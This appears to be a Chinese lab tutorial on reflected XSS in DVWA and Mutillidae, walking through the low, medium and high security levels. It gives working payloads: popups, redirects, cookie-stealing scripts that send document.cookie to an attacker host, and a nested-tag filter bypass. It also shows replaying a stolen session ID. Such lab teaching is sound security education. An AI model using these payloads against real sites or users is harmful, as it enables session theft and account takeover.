0
点赞
收藏
分享

微信扫一扫

XSS漏洞理由(二)反射型

i奇异 03-11 09:46 阅读 5

概述

用户访问网页中的XSS链接,服务器接受并返回,用户执行反射回来的代码并解析执行

反射型XSS公鸡是一种常见的Web安全漏洞,公鸡者通过构造恶意的URL参数,将恶意脚本注入到目标网页中,当用户点击包含恶意参数的链接时,恶意脚本会被执行,从而导致公鸡者能够获取用户的敏感信息或进行其他恶意操作。

以下是一个反射型XSS公鸡的演示例子:

<!-- 假设目标网页的URL为 http://example.com/search?query= -->
<script>
  // 获取URL参数
  var query = decodeURIComponent(window.location.search.replace("?query=", ""));
  // 在页面中插入恶意脚本
  document.write("<h1>搜索结果: " + query + "</h1>");
</script>

在上述例子中,公鸡者构造了一个恶意的URL参数,当用户访问该URL时,恶意脚本会被执行,并将用户的搜索内容插入到页面中。这样,公鸡者就能够获取用户的搜索内容。

为了防止反射型XSS公鸡,开发者应该对用户输入进行严格的过滤和转义,确保用户输入不会被当作脚本执行。常见的防御措施包括使用安全的编码函数对用户输入进行转义,以及使用内容安全策略(Content Security Policy)来限制页面中可以执行的脚本来源。


低安全级别


代码分析

XSS漏洞理由(二)反射型_php

弹框警告

XSS漏洞理由(二)反射型_php_02

页面重定向

<script>location.href="http://172.16.70.214/mutillidae/robots.txt"</script> 

XSS漏洞理由(二)反射型_html_03

获取cookie

服务端

启动apache服务

service apache2 start

编写cookie接收脚本 

修改html和php权限

root@kali:/var/www# chmod 777 html

root@kali:/var/www#

root@kali:/var/www# cd html/

root@kali:/var/www/html# chmod 777 cookie.php

靶机访问 

<script>window.open('http://172.16.70.216/cookie.php?cookie='+document.cookie)</script>

<script>document.location="http://172.16.70.216/cookie.php?cookie="+document.cookie</script>

<script>new Image().src="http://172.16.70.216/cookie.php?cookie="+document.cookie;</script> 

cookie查看 

通过log 

cd /var/log/apache2/

cat access.log

通过文件

cookie.txt

XSS漏洞理由(二)反射型_搜索_04

cookie利用 

利用思路 

在win7靶机端用user账号访问,然后通过日志或者文件查看cookie

之后在kali端用Burp或者Tamper携带win7的cookie访问,查看账号是否user 

采用Burp+Cookie利用

XSS漏洞理由(二)反射型_html_05

采用Tamper利用

cookie=security=low; PHPSESSID=p0e1svvfl7929198je19pq8v26 

XSS漏洞理由(二)反射型_php_06

XSS漏洞理由(二)反射型_html_07

中安全级别

代码审计

XSS漏洞理由(二)反射型_搜索_08

语句利用

<scrip<script>t>alert('xss')</script>   // 拼凑成一个可用的标签

XSS漏洞理由(二)反射型_搜索_09

tr_replace过滤在之前文件包含章节使用过,绕过方式一样

高安全级别

代码审计

不执行脚本功能,只文本输出,所以基本不会弹窗

XSS漏洞理由(二)反射型_php_10

XSS漏洞理由(二)反射型_搜索_11

Mutillidae II 环境

XSS漏洞理由(二)反射型_html_12

XSS漏洞理由(二)反射型_html_13

XSS漏洞理由(二)反射型_html_14


举报

相关推荐

0 条评论